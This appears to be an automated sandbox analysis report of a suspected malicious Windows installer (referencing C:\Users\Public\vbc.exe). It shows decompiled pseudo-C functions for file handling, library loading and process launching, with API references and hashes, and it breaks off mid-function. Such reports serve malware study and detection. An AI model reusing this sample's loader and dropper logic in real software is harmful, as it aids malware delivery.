                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                                                              • Opcode ID: bd8df2336641fef3ba5122bb8ee68c85eddc30aa2a367a6b625e197710042414
                                                                                                                                                                                                              • Instruction ID: 619251f0f573ab9f47b456b69b18ba8f896b0ae65f75ba169e48b75275ff5987
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bd8df2336641fef3ba5122bb8ee68c85eddc30aa2a367a6b625e197710042414
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F301D131B242109BE7194B38AE04B2A36A8E754315F11813AF855F61F1DA78CC129B4C
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                              			E00406631(signed int _a4) {
                                                                                                                                                                                                              				struct HINSTANCE__* _t5;
                                                                                                                                                                                                              				signed int _t10;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t10 = _a4 << 3;
                                                                                                                                                                                                              				_t8 =  *(_t10 + 0x40a258);
                                                                                                                                                                                                              				_t5 = GetModuleHandleA( *(_t10 + 0x40a258));
                                                                                                                                                                                                              				if(_t5 != 0) {
                                                                                                                                                                                                              					L2:
                                                                                                                                                                                                              					return GetProcAddress(_t5,  *(_t10 + 0x40a25c));
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				_t5 = E004065C3(_t8); // executed
                                                                                                                                                                                                              				if(_t5 == 0) {
                                                                                                                                                                                                              					return 0;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				goto L2;
                                                                                                                                                                                                              			}





                                                                                                                                                                                                              0x00406639
                                                                                                                                                                                                              0x0040663c
                                                                                                                                                                                                              0x00406643
                                                                                                                                                                                                              0x0040664b
                                                                                                                                                                                                              0x00406657
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040665e
                                                                                                                                                                                                              0x0040664e
                                                                                                                                                                                                              0x00406655
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406666
                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(?,?,?,004034D4,0000000B), ref: 00406643
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,004034D4,0000000B), ref: 0040665E
                                                                                                                                                                                                                • Part of subcall function 004065C3: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004065DA
                                                                                                                                                                                                                • Part of subcall function 004065C3: wsprintfA.USER32 ref: 00406613
                                                                                                                                                                                                                • Part of subcall function 004065C3: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406627
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2547128583-0
                                                                                                                                                                                                              • Opcode ID: 2284c13bb0467c230d08af9fe6f3031970f5259716d95ff003564f382569e38e
                                                                                                                                                                                                              • Instruction ID: e63780c8bf1f0faf28ba6c6d4be53ddd5ff0707a9bdd482d1e4d5d99537df4e3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2284c13bb0467c230d08af9fe6f3031970f5259716d95ff003564f382569e38e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94E086326042106AD6106B70AE04C7773A89F84750702483EF546F2150D7399C3596AD
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 68%
                                                                                                                                                                                                              			E00405DC1(CHAR* _a4, long _a8, long _a12) {
                                                                                                                                                                                                              				signed int _t5;
                                                                                                                                                                                                              				void* _t6;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t5 = GetFileAttributesA(_a4); // executed
                                                                                                                                                                                                              				asm("sbb ecx, ecx");
                                                                                                                                                                                                              				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                                                                                                                                                                              				return _t6;
                                                                                                                                                                                                              			}





                                                                                                                                                                                                              0x00405dc5
                                                                                                                                                                                                              0x00405dd2
                                                                                                                                                                                                              0x00405de7
                                                                                                                                                                                                              0x00405ded

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\Public\vbc.exe,80000000,00000003), ref: 00405DC5
                                                                                                                                                                                                              • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405DE7
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$AttributesCreate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 415043291-0
                                                                                                                                                                                                              • Opcode ID: f7726857ad0760fd27b8592a290aaff25a5a689f9fd17e1a71efc27c39f42f7d
                                                                                                                                                                                                              • Instruction ID: c1cd633b288b309c16b37b55694bd397a2d2f3fd27c3ea135bedd35eac3c4d3c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f7726857ad0760fd27b8592a290aaff25a5a689f9fd17e1a71efc27c39f42f7d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D9D09E31254602AFEF0D8F20DE16F2E7AA2EB84B00F11952CB682944E2DA715819AB19
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                              			E00405D9C(CHAR* _a4) {
                                                                                                                                                                                                              				signed char _t3;
                                                                                                                                                                                                              				signed char _t7;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t3 = GetFileAttributesA(_a4); // executed
                                                                                                                                                                                                              				_t7 = _t3;
                                                                                                                                                                                                              				if(_t7 != 0xffffffff) {
                                                                                                                                                                                                              					SetFileAttributesA(_a4, _t3 & 0x000000fe);
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				return _t7;
                                                                                                                                                                                                              			}





                                                                                                                                                                                                              0x00405da1
                                                                                                                                                                                                              0x00405da7
                                                                                                                                                                                                              0x00405dac
                                                                                                                                                                                                              0x00405db5
                                                                                                                                                                                                              0x00405db5
                                                                                                                                                                                                              0x00405dbe

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetFileAttributesA.KERNELBASE(?,?,004059B4,?,?,00000000,00405B97,?,?,?,?), ref: 00405DA1
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405DB5
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                                                              • Opcode ID: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                                                                                                                                                                              • Instruction ID: 45e1b313f31d266de6e0d804bcdac0c4d644dd7a0ef1fc7463663643c81ebfd1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F9D0A932000021ABD2002728EE0C88BBB91DB00270702CA36FCA4A22B2DB300C129A98
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                              			E00405892(CHAR* _a4) {
                                                                                                                                                                                                              				int _t2;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t2 = CreateDirectoryA(_a4, 0); // executed
                                                                                                                                                                                                              				if(_t2 == 0) {
                                                                                                                                                                                                              					return GetLastError();
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				return 0;
                                                                                                                                                                                                              			}




                                                                                                                                                                                                              0x00405898
                                                                                                                                                                                                              0x004058a0
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004058a6
                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateDirectoryA.KERNELBASE(?,00000000,00403454,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 00405898
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 004058A6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1375471231-0
                                                                                                                                                                                                              • Opcode ID: 1ac3f182099991a074ef026cd112de1bb624e535cee62a6747cbed0a6cbac083
                                                                                                                                                                                                              • Instruction ID: ae32aa403121d558109e23f4dadc85ee7ba81b7b8263ff8d49f56a55f4155d83
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1ac3f182099991a074ef026cd112de1bb624e535cee62a6747cbed0a6cbac083
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D5C04C316045019BE6506B319F08B1B7A549F50741F158439A78AE41E4DA388465D92D
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                              			E00405E68(void* _a4, void* _a8, long _a12) {
                                                                                                                                                                                                              				int _t7;
                                                                                                                                                                                                              				long _t11;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t11 = _a12;
                                                                                                                                                                                                              				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                                                                                                                                                              				if(_t7 == 0 || _t11 != _a12) {
                                                                                                                                                                                                              					return 0;
                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                              					return 1;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              			}





                                                                                                                                                                                                              0x00405e6c
                                                                                                                                                                                                              0x00405e7c
                                                                                                                                                                                                              0x00405e84
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00405e8b
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00405e8d

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WriteFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000), ref: 00405E7C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileWrite
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3934441357-0
                                                                                                                                                                                                              • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                                                                                                              • Instruction ID: 83138c6b6f61fe56512c00d99342466dd547819508ce818909ec7b1084a3bb5f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 48E0463221021AABDF109F60CC04AAB3B6CEB00260F404432FAA4E2140E234E9208AE4
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                              			E00405E39(void* _a4, void* _a8, long _a12) {
                                                                                                                                                                                                              				int _t7;
                                                                                                                                                                                                              				long _t11;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t11 = _a12;
                                                                                                                                                                                                              				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                                                                                                                                                              				if(_t7 == 0 || _t11 != _a12) {
                                                                                                                                                                                                              					return 0;
                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                              					return 1;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              			}





                                                                                                                                                                                                              0x00405e3d
                                                                                                                                                                                                              0x00405e4d
                                                                                                                                                                                                              0x00405e55
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00405e5c
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00405e5e

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ReadFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000), ref: 00405E4D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileRead
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2738559852-0
                                                                                                                                                                                                              • Opcode ID: 416aeb435aa013431afb1a9c1c8b913c8d53da26c76a00aa22b400e2b7bce1d1
                                                                                                                                                                                                              • Instruction ID: cce2834e44819e2e6951819013f8ba23c93adc22c6858a83ce884f24d90f4801
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 416aeb435aa013431afb1a9c1c8b913c8d53da26c76a00aa22b400e2b7bce1d1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BFE0463220061AABCF119F60CC00AEB3B6CEB046E0F044832B955E2040D230EA209BE8
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                              			E00403419(long _a4) {
                                                                                                                                                                                                              				long _t2;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                                                                                                                                                                                              				return _t2;
                                                                                                                                                                                                              			}




                                                                                                                                                                                                              0x00403427
                                                                                                                                                                                                              0x0040342d

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403117,?), ref: 00403427
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FilePointer
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 973152223-0
                                                                                                                                                                                                              • Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                                                                                                                                                                              • Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 78%
                                                                                                                                                                                                              			E00401F7B(void* __ecx) {
                                                                                                                                                                                                              				void* _t8;
                                                                                                                                                                                                              				void* _t12;
                                                                                                                                                                                                              				void* _t14;
                                                                                                                                                                                                              				void* _t16;
                                                                                                                                                                                                              				void* _t17;
                                                                                                                                                                                                              				void* _t20;
                                                                                                                                                                                                              				void* _t22;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t16 = __ecx;
                                                                                                                                                                                                              				_t19 = E00402BCE(_t14);
                                                                                                                                                                                                              				E0040534F(0xffffffeb, _t6);
                                                                                                                                                                                                              				_t8 = E004058C7(_t19); // executed
                                                                                                                                                                                                              				_t20 = _t8;
                                                                                                                                                                                                              				if(_t20 == _t14) {
                                                                                                                                                                                                              					 *((intOrPtr*)(_t22 - 4)) = 1;
                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                              					if( *((intOrPtr*)(_t22 - 0x20)) != _t14) {
                                                                                                                                                                                                              						_t12 = E004066A6(_t16, _t20); // executed
                                                                                                                                                                                                              						if( *((intOrPtr*)(_t22 - 0x24)) < _t14) {
                                                                                                                                                                                                              							if(_t12 != _t14) {
                                                                                                                                                                                                              								 *((intOrPtr*)(_t22 - 4)) = 1;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                              							E00406186(_t17, _t12);
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_push(_t20);
                                                                                                                                                                                                              					CloseHandle();
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t22 - 4));
                                                                                                                                                                                                              				return 0;
                                                                                                                                                                                                              			}










                                                                                                                                                                                                              0x00401f7b
                                                                                                                                                                                                              0x00401f81
                                                                                                                                                                                                              0x00401f86
                                                                                                                                                                                                              0x00401f8c
                                                                                                                                                                                                              0x00401f91
                                                                                                                                                                                                              0x00401f95
                                                                                                                                                                                                              0x004027bf
                                                                                                                                                                                                              0x00401f9b
                                                                                                                                                                                                              0x00401f9e
                                                                                                                                                                                                              0x00401fa1
                                                                                                                                                                                                              0x00401fa9
                                                                                                                                                                                                              0x00401fb6
                                                                                                                                                                                                              0x00401fb8
                                                                                                                                                                                                              0x00401fb8
                                                                                                                                                                                                              0x00401fab
                                                                                                                                                                                                              0x00401fad
                                                                                                                                                                                                              0x00401fad
                                                                                                                                                                                                              0x00401fa9
                                                                                                                                                                                                              0x00401fbf
                                                                                                                                                                                                              0x00401fc0
                                                                                                                                                                                                              0x00401fc0
                                                                                                                                                                                                              0x00402a5d
                                                                                                                                                                                                              0x00402a69

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 0040534F: lstrlenA.KERNEL32(00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 00405388
                                                                                                                                                                                                                • Part of subcall function 0040534F: lstrlenA.KERNEL32(00402EC9,00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 00405398
                                                                                                                                                                                                                • Part of subcall function 0040534F: lstrcatA.KERNEL32(00420530,00402EC9,00402EC9,00420530,00000000,00000000,00000000), ref: 004053AB
                                                                                                                                                                                                                • Part of subcall function 0040534F: SetWindowTextA.USER32(00420530,00420530), ref: 004053BD
                                                                                                                                                                                                                • Part of subcall function 0040534F: SendMessageA.USER32 ref: 004053E3
                                                                                                                                                                                                                • Part of subcall function 0040534F: SendMessageA.USER32 ref: 004053FD
                                                                                                                                                                                                                • Part of subcall function 0040534F: SendMessageA.USER32 ref: 0040540B
                                                                                                                                                                                                                • Part of subcall function 004058C7: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00422558,Error launching installer), ref: 004058F0
                                                                                                                                                                                                                • Part of subcall function 004058C7: CloseHandle.KERNEL32(?), ref: 004058FD
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00401FC0
                                                                                                                                                                                                                • Part of subcall function 004066A6: WaitForSingleObject.KERNEL32(?,00000064), ref: 004066B7
                                                                                                                                                                                                                • Part of subcall function 004066A6: GetExitCodeProcess.KERNELBASE(?,?), ref: 004066D9
                                                                                                                                                                                                                • Part of subcall function 00406186: wsprintfA.USER32 ref: 00406193
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2972824698-0
                                                                                                                                                                                                              • Opcode ID: cdc221f89d23c6c352f85f415f0525d99305980568e953e987afbaa242dd52f5
                                                                                                                                                                                                              • Instruction ID: c39b2fab311c6406d0a75a142b00e3de853cd320024f06f566d71e8db0f4d4b7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cdc221f89d23c6c352f85f415f0525d99305980568e953e987afbaa242dd52f5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 00F09632605121DBCB20BBA14E8499EB2A4DF01318B25463FF502B21D1C77C4D428A6E
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                              C-Code - Quality: 96%
                                                                                                                                                                                                              			E0040548D(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                                                                                                                                                                              				struct HWND__* _v8;
                                                                                                                                                                                                              				struct tagRECT _v24;
                                                                                                                                                                                                              				void* _v32;
                                                                                                                                                                                                              				signed int _v36;
                                                                                                                                                                                                              				int _v40;
                                                                                                                                                                                                              				int _v44;
                                                                                                                                                                                                              				signed int _v48;
                                                                                                                                                                                                              				int _v52;
                                                                                                                                                                                                              				void* _v56;
                                                                                                                                                                                                              				void* _v64;
                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                              				struct HWND__* _t87;
                                                                                                                                                                                                              				struct HWND__* _t89;
                                                                                                                                                                                                              				long _t90;
                                                                                                                                                                                                              				int _t95;
                                                                                                                                                                                                              				int _t96;
                                                                                                                                                                                                              				long _t99;
                                                                                                                                                                                                              				void* _t102;
                                                                                                                                                                                                              				intOrPtr _t124;
                                                                                                                                                                                                              				struct HWND__* _t128;
                                                                                                                                                                                                              				int _t150;
                                                                                                                                                                                                              				int _t153;
                                                                                                                                                                                                              				long _t157;
                                                                                                                                                                                                              				struct HWND__* _t161;
                                                                                                                                                                                                              				struct HMENU__* _t163;
                                                                                                                                                                                                              				long _t165;
                                                                                                                                                                                                              				void* _t166;
                                                                                                                                                                                                              				char* _t167;
                                                                                                                                                                                                              				char* _t168;
                                                                                                                                                                                                              				int _t169;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t87 =  *0x423f24; // 0x0
                                                                                                                                                                                                              				_t157 = _a8;
                                                                                                                                                                                                              				_t150 = 0;
                                                                                                                                                                                                              				_v8 = _t87;
                                                                                                                                                                                                              				if(_t157 != 0x110) {
                                                                                                                                                                                                              					__eflags = _t157 - 0x405;
                                                                                                                                                                                                              					if(_t157 == 0x405) {
                                                                                                                                                                                                              						CloseHandle(CreateThread(0, 0, E00405421, GetDlgItem(_a4, 0x3ec), 0,  &_a8));
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					__eflags = _t157 - 0x111;
                                                                                                                                                                                                              					if(_t157 != 0x111) {
                                                                                                                                                                                                              						L17:
                                                                                                                                                                                                              						__eflags = _t157 - 0x404;
                                                                                                                                                                                                              						if(_t157 != 0x404) {
                                                                                                                                                                                                              							L25:
                                                                                                                                                                                                              							__eflags = _t157 - 0x7b;
                                                                                                                                                                                                              							if(_t157 != 0x7b) {
                                                                                                                                                                                                              								goto L20;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_t89 = _v8;
                                                                                                                                                                                                              							__eflags = _a12 - _t89;
                                                                                                                                                                                                              							if(_a12 != _t89) {
                                                                                                                                                                                                              								goto L20;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
                                                                                                                                                                                                              							__eflags = _t90 - _t150;
                                                                                                                                                                                                              							_a12 = _t90;
                                                                                                                                                                                                              							if(_t90 <= _t150) {
                                                                                                                                                                                                              								L36:
                                                                                                                                                                                                              								return 0;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_t163 = CreatePopupMenu();
                                                                                                                                                                                                              							AppendMenuA(_t163, _t150, 1, E004062BB(_t150, _t157, _t163, _t150, 0xffffffe1));
